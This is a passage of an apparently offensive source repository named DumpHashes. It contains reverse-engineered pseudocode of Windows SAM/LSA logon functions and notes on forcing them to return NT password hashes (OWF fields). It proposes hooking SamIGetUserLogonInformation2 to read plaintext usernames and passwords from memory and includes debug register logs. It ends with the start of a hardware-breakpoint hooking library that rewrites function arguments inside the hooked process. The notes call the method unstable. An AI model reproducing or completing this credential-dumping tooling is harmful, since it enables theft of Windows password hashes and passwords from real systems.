| LOGON_HOURS LogonHours; 801 | USHORT BadPasswordCount; 802 | USHORT LogonCount; 803 | USHORT CountryCode; 804 | USHORT CodePage; 805 | BOOLEAN LmPasswordPresent; 806 | BOOLEAN NtPasswordPresent; 807 | BOOLEAN PasswordExpired; 808 | BOOLEAN PrivateDataSensitive; 809 | } USER_ALL_INFORMATION, *PUSER_ALL_INFORMATION; 810 | 811 | */ 812 | 813 | 814 | 815 | /* 816 | __int64 __fastcall @lsasrv!LsapSamExtGetUserLogonInformation2( 817 | SAMPR_HANDLE DomainHandle, // RCX 818 | ULONG LookupFlags, // RDX 819 | PUNICODE_STRING UserName, // R8 820 | ULONG WhichFields, // R9 821 | ULONG ExtendedFields, // [RSP+0x28] 822 | PSAM_MAPPED_ATTRIBUTE_SET MappedAttrSet, // [RSP+0x30] 823 | PUSER_INTERNAL6_INFORMATION * UserInfoOut, // [RSP+0x38] // OUT 824 | PSID_AND_ATTRIBUTES_LIST LocalMembership, // [RSP+0x40] // OUT 825 | 
PSAMPR_HANDLE LocalUserHandle // [RSP+0x48] // OUT 826 | ) 827 | { 828 | 829 | UNREFERENCED_PARAMETER(MappedAttrSet); 830 | 831 | // Use the global domain handle instead of the one passed in RCX 832 | DomainHandle = g_hIdProvExtSamAccountDomain; 833 | 834 | if (IsSamIDecodeClaimsBlobPresent()) { 835 | return @samsrv!SamIGetUserLogonInformation2( 836 | DomainHandle, 837 | LookupFlags, 838 | UserName, 839 | 0x1B, // override WhichFields (explained below) 840 | ExtendedFields, 841 | UserInfoOut, 842 | LocalMembership, 843 | LocalUserHandle 844 | ); 845 | } 846 | 847 | // Otherwise bail out 848 | return STATUS_NOT_IMPLEMENTED; 849 | } 850 | */ 851 | 852 | // ======================================================================================================================================================= 853 | 854 | /* 855 | NTSTATUS @samsrv!SamIGetUserLogonInformation2( 856 | SAMPR_HANDLE DomainHandle, // RCX 857 | ULONG LookupFlags, // RDX 858 | PUNICODE_STRING UserName, // R8 859 | ULONG WhichFields, // R9 860 | ULONG ExtendedFields, // [RSP+0x28] 861 | PUSER_INTERNAL6_INFORMATION* UserInfo, // [RSP+0x30] // OUT 862 | PSID_AND_ATTRIBUTES_LIST* LocalMembership, // [RSP+0x38] // OUT 863 | PSAMPR_HANDLE* LocalUserHandle // [RSP+0x40] // OUT 864 | ) 865 | { 866 | 867 | return @samsrv!SampGetUserLogonInformation( 868 | DomainHandle, 869 | LookupFlags, 870 | UserName, 871 | 0x1B, // override WhichFields (explained below) 872 | ExtendedFields, 873 | UserInfo, 874 | LocalMembership, 875 | LocalUserHandle 876 | ); 877 | } 878 | */ 879 | 880 | 881 | 882 | // ======================================================================================================================================================= 883 | 884 | /* 885 | NTSTATUS @samsrv!SampGetUserLogonInformation( 886 | SAMPR_HANDLE DomainHandle, // RCX 887 | ULONG LookupFlags, // RDX 888 | PUNICODE_STRING UserName, // R8 889 | ULONG WhichFields, // R9 890 | ULONG ExtendedFields, // [RSP+0x28] 891 | 
PUSER_INTERNAL6_INFORMATION* UserInfo, // [RSP+0x30] // OUT 892 | PSID_AND_ATTRIBUTES_LIST* LocalMembership, // [RSP+0x38] // OUT 893 | PSAMPR_HANDLE* LocalUserHandle // [RSP+0x40] // OUT 894 | ) 895 | { 896 | 897 | NTSTATUS STATUS; 898 | UNICODE_STRING LocalName; 899 | PWCHAR NameBuffer = NULL; 900 | SIZE_T AllocSize; 901 | USHORT NameChars; 902 | BOOLEAN bHeapAllocated = FALSE; 903 | ULONG DsrmBehavior; 904 | BOOLEAN bIsDsRunning; 905 | 906 | // 1) Check service state 907 | if (g_SampServiceState != 2) 908 | { 909 | // 910 | // WPP tracing:::WPP_SF_D( TRACE_LEVEL_ERROR, TraceGUIDs, DomainHandle, LookupFlags ); 911 | // 912 | return STATUS_INVALID_DOMAIN_STATE; // 0xC00000DC 913 | } 914 | 915 | // 2) Compute how many WCHARs in the incoming UserName 916 | NameChars = UserName->Length / sizeof(WCHAR); 917 | AllocSize = (NameChars + 1) * sizeof(WCHAR); 918 | AllocSize = (AllocSize + 0xF) & ~0xF; // Round up to 16-byte 919 | 920 | // 3) Allocate a temporary buffer for the name 921 | NameBuffer = (PWCHAR)_alloca(AllocSize); 922 | if (NameBuffer == NULL) 923 | { 924 | NameBuffer = g_pfnAllocate(AllocSize); 925 | if (NameBuffer == NULL) 926 | { 927 | // 928 | // WPP tracing::: WPP_SF_D( TRACE_LEVEL_ERROR, TraceGUIDs, LookupFields ); 929 | // 930 | return STATUS_INSUFFICIENT_RESOURCES; // 0xC0000017 931 | } 932 | bHeapAllocated = TRUE; 933 | } 934 | 935 | 936 | RtlCopyMemory(NameBuffer, UserName->Buffer, UserName->Length); 937 | NameBuffer[NameChars] = L'\0'; 938 | 939 | // 4) Initialize the UNICODE_STRING structure 940 | LocalName.Length = (USHORT)UserName->Length; 941 | LocalName.MaximumLength = (USHORT)AllocSize; 942 | LocalName.Buffer = NameBuffer; 943 | 944 | 945 | // 5) Validate the SAM context handle 946 | STATUS = SampValidateContext(DomainHandle); 947 | if (!NT_SUCCESS(STATUS)) 948 | { 949 | // 950 | // WPP tracing::: WPP_SF_D( TRACE_LEVEL_ERROR, TraceGUIDs, STATUS ); 951 | // 952 | goto _END_OF_FUNC; 953 | } 954 | 955 | // 6) Check if the DS is available 956 | 
if (SampUseDsData) 957 | { 958 | DsrmBehavior = SampDsrmAdminBehavior; 959 | 960 | // if DsrmBehavior == 0 (use DS), or == 1 AND DS is up, then DS mode 961 | 962 | if (DsrmBehavior == 0 || ( DsrmBehavior == 1 && (bIsDsRunning = SampDsIsRunning(), bIsDsRunning) ) ) 963 | { 964 | // increment active-threads count 965 | STATUS = SampIncrementActiveThreads(); 966 | if (!NT_SUCCESS(STATUS)) 967 | { 968 | // 969 | // WPP tracing::: WPP_SF_D( TRACE_LEVEL_WARNING, TraceGUIDs, STATUS ); 970 | // 971 | goto _END_OF_FUNC; 972 | 973 | } 974 | 975 | // 976 | // --- dynamic DS-extension dispatch --- 977 | // DomainHandle embeds a domain-index at offset 0xC8; 978 | // use it to find our DS-extension vtable entry. 979 | // 980 | // ULONG uIdx = *(ULONG*)((BYTE*)DomainHandle + 0xC8); 981 | // PSAMP_DEFINED_DOMAIN pSamDefDomain = &SampDefinedDomains[uIdx]; 982 | 983 | // STATUS = pSamDefDomain->DsExtension->GetUserLogonInformation( 984 | // STATUS = SampExtGetUserLogonInformationDs( 985 | 986 | // DomainHandle, 987 | // LookupFlags, 988 | // &LocalName, 989 | // WhichFields, 990 | // ExtendedFields, 991 | // UserInfo, 992 | // LocalMembership, 993 | // LocalUserHandle 994 | // ); 995 | // 996 | 997 | // decrement thread count 998 | SampDecrementActiveThreads(); 999 | } 1000 | else 1001 | { 1002 | // DS is unavailable 1003 | STATUS = STATUS_DS_UNAVAILABLE; // 0xC0000064 1004 | // 1005 | // WPP tracing::: WPP_SF_D( TRACE_LEVEL_ERROR, TraceGUIDs, STATUS ); 1006 | // 1007 | } 1008 | } 1009 | else 1010 | { 1011 | // 7) Registry-mode helper 1012 | STATUS = SampGetUserLogonInformationRegistryMode( 1013 | DomainHandle, 1014 | LookupFlags, 1015 | ExtendedFields, 1016 | UserInfo, 1017 | LocalMembership, 1018 | LocalUserHandle 1019 | ); 1020 | } 1021 | 1022 | _END_OF_FUNC: 1023 | if (bHeapAllocated) 1024 | { 1025 | g_pfnFree(NameBuffer); 1026 | } 1027 | return STATUS; 1028 | } 1029 | */ 1030 | 1031 | /* 1032 | 1033 | #define USER_ALL_BASIC_INFO_MASK \ 1034 | (USER_ALL_USERNAME | \ 1035 | 
USER_ALL_FULLNAME | \ 1036 | USER_ALL_PRIMARYGROUPID | \ 1037 | USER_ALL_ADMINCOMMENT) 1038 | 1039 | 1040 | -> Windows is forcing the WhichFields to be 0x1B (USER_ALL_BASIC_INFO_MASK) in the @samsrv!SamIGetUserLogonInformation2 and @lsasrv!LsapSamExtGetUserLogonInformation2 functions 1041 | -> USER_ALL_BASIC_INFO_MASK is not defined in ntsam.h (it's defined above - you can see why it's 'basic') 1042 | -> Maybe set WhichFields to USER_ALL_READ_TRUSTED_MASK2: 1043 | USER_ALL_READ_TRUSTED_MASK2 = USER_ALL_READ_TRUSTED_MASK (https://github.com/winsiderss/phnt/blob/master/ntsam.h#L1275C9-L1275C36) + USER_ALL_OWFPASSWORD 1044 | -> However, to set WhichFields, we need to make sure that whoever populates the domain handle 1045 | (which is set to g_hIdProvExtSamAccountDomain by @lsasrv!LsapSamExtGetUserLogonInformation2) 1046 | is given enough access to use USER_ALL_READ_TRUSTED_MASK2 1047 | -> USER_ALL_READ_TRUSTED_MASK2 is defined below: 1048 | 1049 | #define USER_ALL_READ_TRUSTED_MASK2 \ 1050 | (USER_ALL_NTPASSWORDPRESENT | \ 1051 | USER_ALL_LMPASSWORDPRESENT | \ 1052 | USER_ALL_OWFPASSWORD | \ 1053 | USER_ALL_PASSWORDEXPIRED | \ 1054 | USER_ALL_SECURITYDESCRIPTOR | \ 1055 | USER_ALL_PRIVATEDATA) 1056 | 1057 | */ 1058 | 1059 | 1060 | 1061 | /* 1062 | -> g_hIdProvExtSamAccountDomain is populated by two functions in lsasrv.dll 1063 | 1064 | 1065 | 1. LsapLazyInitSamConnection 1066 | 1067 | // ..... 
1068 | 1069 | loc_180027A7E: 1070 | lea rax, ?g_IdProvExtDomainSid@@3PEAXEA ; void * g_IdProvExtDomainSid 1071 | mov r8d, 2000000h ; unsigned int 1072 | mov [rsp+48h+var_18], rax ; void ** 1073 | lea r9, ?g_hIdProvExtSamAccountDomain@@3PEAXEA ; void ** 1074 | and [rsp+48h+var_20], 0 1075 | lea rdx, ?g_hIdProvExtSamServer@@3PEAXEA ; void ** 1076 | mov cl, 1 ; unsigned __int8 1077 | mov [rsp+48h+var_28], r8d ; unsigned int 1078 | call ?LsapOpenLocalSamHandles@@YAJEPEAPEAXK0K00@Z ; LsapOpenLocalSamHandles(uchar,void * *,ulong,void * *,ulong,void * *,void * *) 1079 | mov ebx, eax 1080 | test eax, eax 1081 | jns short loc_180027AC6 1082 | 1083 | 1084 | // ..... 1085 | 1086 | 1087 | 2. LsapFindConnectedUserByLocalName 1088 | 1089 | // ..... 1090 | mov rax, [rsp+48h+var_28] 1091 | mov r8d, 2000000h ; unsigned int 1092 | lea r9, ?g_hIdProvExtSamAccountDomain@@3PEAXEA ; void ** 1093 | and [rsp+48h+var_20], 0 1094 | lea rdx, ?g_hIdProvExtSamServer@@3PEAXEA ; void ** 1095 | mov cl, 1 ; unsigned __int8 1096 | call ?LsapOpenLocalSamHandles@@YAJEPEAPEAXK0K00@Z ; LsapOpenLocalSamHandles(uchar,void * *,ulong,void * *,ulong,void * *,void * *) 1097 | mov ebx, eax 1098 | test eax, eax 1099 | jns short loc_180027AC6 1100 | // ..... 
1101 | 1102 | 1103 | -> Both of these functions are calling LsapOpenLocalSamHandles like this: 1104 | 1105 | LsapOpenLocalSamHandles( 1106 | flags, ; CL = provider index (0x1 for built-in SAM) 1107 | &g_hIdProvExtSamServer, ; RDX = out server handle 1108 | 0x02000000, ; R8 = DesiredServerAccess 1109 | &g_hIdProvExtSamAccountDomain,; R9 = out domain handle 1110 | 0x02000000, ; [rsp] = DesiredDomainAccess 1111 | &g_IdProvExtDomainSid, ; [rsp+8] = out domain SID 1112 | NULL ; [rsp+12] = out SID length 1113 | ) 1114 | 1115 | -> 0x02000000 is MAXIMUM_ALLOWED (not sure), so maybe we can already set it to USER_ALL_READ_TRUSTED_MASK2 instead of the forced USER_ALL_BASIC_INFO_MASK 1116 | */ 1117 | 1118 | 1119 | 1120 | 1121 | 1122 | 1123 | /* 1124 | @1 Compiled with PRINT_CTX 1125 | @2 Get-Content C:\DummyDebug.log -Encoding Unicode | Where-Object { $_ -match '\[i\] Thread Context|\[i\] R9:' } 1126 | 1127 | 1128 | [i] Thread Context [ #1 ]: 1129 | [i] R9: 0x0000000000000004 1130 | [i] Thread Context [ #2 ]: 1131 | [i] R9: 0x0000000000000004 1132 | [i] Thread Context [ #3 ]: 1133 | [i] R9: 0x0000000000000004 1134 | [i] Thread Context [ #4 ]: 1135 | [i] R9: 0x0000000000000004 1136 | [i] Thread Context [ #5 ]: 1137 | [i] R9: 0x0000000000000004 1138 | [i] Thread Context [ #6 ]: 1139 | [i] R9: 0x0000000000000004 1140 | [i] Thread Context [ #7 ]: 1141 | [i] R9: 0x0000000023000000 1142 | [i] Thread Context [ #8 ]: 1143 | [i] R9: 0x00000000000003C0 1144 | [i] Thread Context [ #9 ]: 1145 | [i] R9: 0x0000000000100004 1146 | [i] Thread Context [ #10 ]: 1147 | [i] R9: 0x0000000000000004 1148 | [i] Thread Context [ #11 ]: 1149 | [i] R9: 0x0000000000000004 1150 | [i] Thread Context [ #12 ]: 1151 | [i] R9: 0x0000000000000004 1152 | [i] Thread Context [ #13 ]: 1153 | [i] R9: 0x0000000000000004 1154 | [i] Thread Context [ #14 ]: 1155 | [i] R9: 0x0000000000000004 1156 | [i] Thread Context [ #15 ]: 1157 | [i] R9: 0x0000000000000004 1158 | [i] Thread Context [ #16 ]: 1159 | [i] R9: 
0x0000000000000004 1160 | [i] Thread Context [ #17 ]: 1161 | [i] R9: 0x0000000000000004 1162 | [i] Thread Context [ #18 ]: 1163 | [i] R9: 0x0000000000000004 1164 | [i] Thread Context [ #19 ]: 1165 | [i] R9: 0x0000000023000000 1166 | [i] Thread Context [ #20 ]: 1167 | [i] R9: 0x00000000000003C0 1168 | [i] Thread Context [ #21 ]: 1169 | [i] R9: 0x0000000000100004 1170 | [i] Thread Context [ #22 ]: 1171 | [i] R9: 0x0000000000000004 1172 | [i] Thread Context [ #23 ]: 1173 | [i] R9: 0x0000000000000004 1174 | [i] Thread Context [ #24 ]: 1175 | [i] R9: 0x0000000000000004 1176 | 1177 | -> These values correspond to the following: 1178 | 1179 | 1. 0x0000000000000004 = USER_ALL_USERID 1180 | 2. 0x0000000023000000 = USER_ALL_NTPASSWORDPRESENT | USER_ALL_LMPASSWORDPRESENT | USER_ALL_OWFPASSWORD 1181 | 3. 0x00000000000003C0 = USER_ALL_HOMEDIRECTORY | USER_ALL_HOMEDIRECTORYDRIVE | USER_ALL_SCRIPTPATH | USER_ALL_PROFILEPATH 1182 | 4. 0x0000000000100004 = USER_ALL_NTPASSWORDPRESENT | USER_ALL_USERID 1183 | 1184 | -> All are forced to be 0x1B 1185 | -> However, we can force set 'WhichFields' to be USER_ALL_READ_TRUSTED_MASK2 when its passed as 0x0000000023000000 1186 | -> USER_ALL_READ_TRUSTED_MASK2 is equal to 0x3F000000 1187 | 1188 | @3 Get-Content C:\DummyDebug.log -Encoding Unicode | Where-Object { $_ -match '\[i\] Thread Context|\[i\] Rdx:' } 1189 | 1190 | [i] Thread Context [ #1 ]: 1191 | [i] Rdx: 0x0000000000004000 1192 | [i] Thread Context [ #2 ]: 1193 | [i] Rdx: 0x0000000000000000 1194 | [i] Thread Context [ #3 ]: 1195 | [i] Rdx: 0x0000000000004000 1196 | [i] Thread Context [ #4 ]: 1197 | [i] Rdx: 0x0000000000004000 1198 | [i] Thread Context [ #5 ]: 1199 | [i] Rdx: 0x0000000000004000 1200 | [i] Thread Context [ #6 ]: 1201 | [i] Rdx: 0x0000000000004000 1202 | [i] Thread Context [ #7 ]: 1203 | [i] Rdx: 0x0000000000004000 1204 | [i] Thread Context [ #8 ]: 1205 | [i] Rdx: 0x0000000000004000 1206 | [i] Thread Context [ #9 ]: 1207 | [i] Rdx: 0x0000000000008000 1208 | [i] Thread 
Context [ #10 ]: 1209 | [i] Rdx: 0x0000000000000080 1210 | [i] Thread Context [ #11 ]: 1211 | [i] Rdx: 0x0000000000000080 1212 | [i] Thread Context [ #12 ]: 1213 | [i] Rdx: 0x0000000000000080 1214 | [i] Thread Context [ #13 ]: 1215 | [i] Rdx: 0x0000000000000080 1216 | [i] Thread Context [ #14 ]: 1217 | [i] Rdx: 0x0000000000000080 1218 | [i] Thread Context [ #15 ]: 1219 | [i] Rdx: 0x0000000000004000 1220 | [i] Thread Context [ #16 ]: 1221 | [i] Rdx: 0x0000000000004000 1222 | [i] Thread Context [ #17 ]: 1223 | [i] Rdx: 0x0000000000004000 1224 | [i] Thread Context [ #18 ]: 1225 | [i] Rdx: 0x0000000000004000 1226 | [i] Thread Context [ #19 ]: 1227 | [i] Rdx: 0x0000000000004000 1228 | [i] Thread Context [ #20 ]: 1229 | [i] Rdx: 0x0000000000004000 1230 | [i] Thread Context [ #21 ]: 1231 | [i] Rdx: 0x0000000000008000 1232 | [i] Thread Context [ #22 ]: 1233 | [i] Rdx: 0x0000000000000080 1234 | [i] Thread Context [ #23 ]: 1235 | [i] Rdx: 0x0000000000000080 1236 | [i] Thread Context [ #24 ]: 1237 | [i] Rdx: 0x0000000000000080 1238 | 1239 | @4 Get-Content C:\DummyDebug.log -Encoding Unicode | Where-Object { $_ -match '\[i\] Thread Context|\[i\] Rsi:' } 1240 | 1241 | [i] Thread Context [ #1 ]: 1242 | [i] Rsi: 0x0000000000004000 1243 | [i] Thread Context [ #2 ]: 1244 | [i] Rsi: 0x0000000000000001 1245 | [i] Thread Context [ #3 ]: 1246 | [i] Rsi: 0x00007FFCBCE33D20 1247 | [i] Thread Context [ #4 ]: 1248 | [i] Rsi: 0x00007FFCBCE33D20 1249 | [i] Thread Context [ #5 ]: 1250 | [i] Rsi: 0x00007FFCBCE33D20 1251 | [i] Thread Context [ #6 ]: 1252 | [i] Rsi: 0x00007FFCBCE33D20 1253 | [i] Thread Context [ #7 ]: 1254 | [i] Rsi: 0x00007FFCBCE33D20 1255 | [i] Thread Context [ #8 ]: 1256 | [i] Rsi: 0x00007FFCBCE33D20 1257 | [i] Thread Context [ #9 ]: 1258 | [i] Rsi: 0x000000EBE167D5C8 1259 | [i] Thread Context [ #10 ]: 1260 | [i] Rsi: 0x00007FFCBCE33D20 1261 | [i] Thread Context [ #11 ]: 1262 | [i] Rsi: 0x00007FFCBCE33D20 1263 | [i] Thread Context [ #12 ]: 1264 | [i] Rsi: 0x00007FFCBCE33D20 
1265 | [i] Thread Context [ #13 ]: 1266 | [i] Rsi: 0x00007FFCBCE33D20 1267 | [i] Thread Context [ #14 ]: 1268 | [i] Rsi: 0x00007FFCBCE33D20 1269 | [i] Thread Context [ #15 ]: 1270 | [i] Rsi: 0x00007FFCBCE33D20 1271 | [i] Thread Context [ #16 ]: 1272 | [i] Rsi: 0x00007FFCBCE33D20 1273 | [i] Thread Context [ #17 ]: 1274 | [i] Rsi: 0x00007FFCBCE33D20 1275 | [i] Thread Context [ #18 ]: 1276 | [i] Rsi: 0x00007FFCBCE33D20 1277 | [i] Thread Context [ #19 ]: 1278 | [i] Rsi: 0x00007FFCBCE33D20 1279 | [i] Thread Context [ #20 ]: 1280 | [i] Rsi: 0x00007FFCBCE33D20 1281 | [i] Thread Context [ #21 ]: 1282 | [i] Rsi: 0x000000EBE13FD858 1283 | [i] Thread Context [ #22 ]: 1284 | [i] Rsi: 0x00007FFCBCE33D20 1285 | [i] Thread Context [ #23 ]: 1286 | [i] Rsi: 0x00007FFCBCE33D20 1287 | [i] Thread Context [ #24 ]: 1288 | [i] Rsi: 0x00007FFCBCE33D20 1289 | */ 1290 | 1291 | 1292 | /* 1293 | @ NOTE: Remember that SamIGetUserLogonInformation2 is a wrapper for SampGetUserLogonInformation. 1294 | 1295 | @ RESULT: 1296 | -> Failure when forcing the 'WhichFields' parameter in SampGetUserLogonInformation. The function will return STATUS_INVALID_INFO_CLASS (0xC0000003) 1297 | 1298 | @ SUBSTITUTION (1): 1299 | -> At the start of SamIGetUserLogonInformation2, hook and read: 1300 | * R8 // Username | dt _UNICODE_STRING @r8 1301 | * R8 + 0x10 // ?? | dt _UNICODE_STRING @r8+0x10 1302 | * R8 + 0x20 // Workstaion | dt _UNICODE_STRING @r8+0x20 1303 | * R8 + 0x30 // Password | dt _UNICODE_STRING @r8+0x30 1304 | -> Only read when SampGetUserLogonInformation's RSI and RDX are 0x4000. Because this is a 'Dry-Run' (Password have a higher chance of existing at the mentioned offset). 1305 | -> On this 'Dry-Run' SampGetUserLogonInformation returns 0xC0000073 (STATUS_NONE_MAPPED) 1306 | 1307 | @ SUBSTITUTION (2): 1308 | -> At the start of SamIGetUserLogonInformation2, hook and save the pointer to the PUSER_INTERNAL6_INFORMATION structure. 
1309 | -> At the end of SamIGetUserLogonInformation2, hook and read the saved PUSER_INTERNAL6_INFORMATION pointer. 1310 | 1311 | 1312 | @ NOTE: Both solutions are not stable. 1313 | 1314 | @ Requires More Research 1315 | */ 1316 | -------------------------------------------------------------------------------- /DumpHashes/DumpHashes.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 17.0 23 | Win32Proj 24 | {a93d21b4-2ed6-4f08-bf5a-6e287cf6de20} 25 | DumpHashes 26 | 10.0 27 | Dummy 28 | 29 | 30 | 31 | DynamicLibrary 32 | true 33 | v143 34 | Unicode 35 | 36 | 37 | DynamicLibrary 38 | false 39 | v143 40 | true 41 | Unicode 42 | 43 | 44 | DynamicLibrary 45 | true 46 | v143 47 | Unicode 48 | 49 | 50 | DynamicLibrary 51 | false 52 | v143 53 | true 54 | Unicode 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | Level3 77 | true 78 | WIN32;_DEBUG;DUMPHASHES_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 79 | true 80 | Use 81 | pch.h 82 | 83 | 84 | Windows 85 | true 86 | false 87 | Source.def 88 | 89 | 90 | 91 | 92 | Level3 93 | true 94 | true 95 | true 96 | WIN32;NDEBUG;DUMPHASHES_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 97 | true 98 | Use 99 | pch.h 100 | 101 | 102 | Windows 103 | true 104 | true 105 | true 106 | false 107 | Source.def 108 | 109 | 110 | 111 | 112 | Level3 113 | true 114 | _DEBUG;DUMPHASHES_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 115 | true 116 | NotUsing 117 | pch.h 118 | 119 | 120 | Windows 121 | false 122 | false 123 | Source.def 124 | 125 | 126 | 127 | 128 | Level3 129 | true 130 | true 131 | true 132 | NDEBUG;DUMPHASHES_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 133 | true 134 | NotUsing 135 | pch.h 136 | 137 | 138 | Windows 139 | true 140 | true 141 | false 142 | false 
143 | Source.def 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | 160 | 161 | 162 | 163 | -------------------------------------------------------------------------------- /DumpHashes/DumpHashes.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | Source Files 23 | 24 | 25 | Source Files 26 | 27 | 28 | 29 | 30 | Header Files 31 | 32 | 33 | Header Files 34 | 35 | 36 | Header Files 37 | 38 | 39 | Header Files 40 | 41 | 42 | 43 | 44 | Source Files 45 | 46 | 47 | -------------------------------------------------------------------------------- /DumpHashes/DumpHashes.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /DumpHashes/HardwareBreakingLib.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | #include "Structs.h" 5 | #include "HardwareBreakingLib.h" 6 | #include "Log.h" 7 | 8 | //--------------------------------------------------------------------------------------------------------------------------------------------------------- 9 | //--------------------------------------------------------------------------------------------------------------------------------------------------------- 10 | 11 | #pragma section(".text") 12 | __declspec(allocate(".text")) const unsigned char ucRet[] = { 0xC3 }; 13 | 14 | VOID BLOCK_REAL(IN PCONTEXT pThreadCtx) 15 | { 16 | 
pThreadCtx->Rip = (ULONG_PTR)&ucRet; 17 | } 18 | 19 | //------------------------------------------------------------------------------------------------------------------------------------------------------------------ 20 | //------------------------------------------------------------------------------------------------------------------------------------------------------------------ 21 | 22 | 23 | PBYTE GetFunctionArgument(IN PCONTEXT pThreadCtx, IN DWORD dwParmIndex) { 24 | 25 | // The first 4 arguments in x64 are in the "RCX - RDX - R8 - R9" registers 26 | switch (dwParmIndex) { 27 | case 0x01: 28 | return (ULONG_PTR)pThreadCtx->Rcx; 29 | case 0x02: 30 | return (ULONG_PTR)pThreadCtx->Rdx; 31 | case 0x03: 32 | return (ULONG_PTR)pThreadCtx->R8; 33 | case 0x04: 34 | return (ULONG_PTR)pThreadCtx->R9; 35 | default: 36 | break; 37 | } 38 | 39 | // Else more arguments are pushed to the stack 40 | return *(ULONG_PTR*)(pThreadCtx->Rsp + (dwParmIndex * sizeof(PVOID))); 41 | } 42 | 43 | VOID SetFunctionArgument(IN PCONTEXT pThreadCtx, IN ULONG_PTR uValue, IN DWORD dwParmIndex) { 44 | 45 | // The first 4 arguments in x64 are in the "RCX - RDX - R8 - R9" registers 46 | switch (dwParmIndex) { 47 | case 0x01: 48 | (ULONG_PTR)pThreadCtx->Rcx = uValue; return; 49 | case 0x02: 50 | (ULONG_PTR)pThreadCtx->Rdx = uValue; return; 51 | case 0x03: 52 | (ULONG_PTR)pThreadCtx->R8 = uValue; return; 53 | case 0x04: 54 | (ULONG_PTR)pThreadCtx->R9 = uValue; return; 55 | default: 56 | break; 57 | } 58 | 59 | // Else more arguments are pushed to the stack 60 | *(ULONG_PTR*)(pThreadCtx->Rsp + (dwParmIndex * sizeof(PVOID))) = uValue; 61 | } 62 | 63 | //------------------------------------------------------------------------------------------------------------------------------------------------------------------ 64 | //------------------------------------------------------------------------------------------------------------------------------------------------------------------ 65 | // HELPER 
FUNCTIONS 66 | 67 | DWORD _GetCurrentProcessId() 68 | { 69 | return (DWORD)(__readgsdword(0x40)); 70 | } 71 | 72 | DWORD _GetCurrentThreadId() 73 | { 74 | return (DWORD)(__readgsdword(0x48)); 75 | } 76 | 77 | HANDLE _GetProcessHeap() 78 | { 79 | PPEB pPeb = (PPEB)(__readgsqword(0x60)); 80 | return (HANDLE)pPeb->ProcessHeap; 81 | } 82 | 83 | 84 | unsigned long long SetDr7Bits(unsigned long long CurrentDr7Register, int StartingBitPosition, int NmbrOfBitsToModify, unsigned long long NewBitValue) 85 | { 86 | unsigned long long mask = (1UL << NmbrOfBitsToModify) - 1UL; 87 | unsigned long long NewDr7Register = (CurrentDr7Register & ~(mask << StartingBitPosition)) | (NewBitValue << StartingBitPosition); 88 | return NewDr7Register; 89 | } 90 | 91 | 92 | //------------------------------------------------------------------------------------------------------------------------------------------------------------------ 93 | //------------------------------------------------------------------------------------------------------------------------------------------------------------------ 94 | // GLOBAL VARIABLES 95 | 96 | 97 | CRITICAL_SECTION g_HookingCriticalSection = { 0 }; 98 | HARDWARE_ENGINE_INIT_SETTINGS_GLOBAL GlobalHardwareBreakpointObject = { 0 }; 99 | DESCRIPTOR_ENTRY* g_Head = NULL; 100 | 101 | 102 | //------------------------------------------------------------------------------------------------------------------------------------------------------------------ 103 | //------------------------------------------------------------------------------------------------------------------------------------------------------------------ 104 | // PRIVATE FUNCTIONS PROTOTYPES 105 | 106 | BOOL SetHardwareBreakpoint(IN DWORD ThreadId, IN PUINT_VAR_T Address, IN DRX Drx, IN BOOL bInitializeHWBP); 107 | LONG ExceptionHandlerCallbackRoutine(IN PEXCEPTION_POINTERS ExceptionInfo); 108 | BOOL SnapshotInsertHardwareBreakpointHookIntoTargetThread(IN PUINT_VAR_T Address, IN DRX Drx, IN 
BOOL bInitializeHWBP, IN DWORD ThreadId); 109 | 110 | //------------------------------------------------------------------------------------------------------------------------------------------------------------------ 111 | //------------------------------------------------------------------------------------------------------------------------------------------------------------------ 112 | 113 | 114 | BOOL InitHardwareBreakpointHooking() 115 | { 116 | 117 | if (GlobalHardwareBreakpointObject.IsInit) 118 | return TRUE; 119 | 120 | RtlSecureZeroMemory(&GlobalHardwareBreakpointObject, sizeof(HARDWARE_ENGINE_INIT_SETTINGS_GLOBAL)); 121 | RtlSecureZeroMemory(&g_HookingCriticalSection, sizeof(CRITICAL_SECTION)); 122 | 123 | GlobalHardwareBreakpointObject.HandlerObject = AddVectoredExceptionHandler(1, (PVECTORED_EXCEPTION_HANDLER)ExceptionHandlerCallbackRoutine); 124 | if (!GlobalHardwareBreakpointObject.HandlerObject) { 125 | DBGPRINTF(L"[!] AddVectoredExceptionHandler Failed: %d\n", GetLastError()); 126 | return FALSE; 127 | } 128 | 129 | InitializeCriticalSection(&g_HookingCriticalSection); 130 | 131 | GlobalHardwareBreakpointObject.IsInit = TRUE; 132 | 133 | return TRUE; 134 | } 135 | 136 | 137 | BOOL CleapUpHardwareBreakpointHooking() 138 | { 139 | 140 | DESCRIPTOR_ENTRY* TempObject = NULL; 141 | 142 | if (!GlobalHardwareBreakpointObject.IsInit) 143 | return TRUE; 144 | 145 | EnterCriticalSection(&g_HookingCriticalSection); 146 | 147 | TempObject = g_Head; 148 | 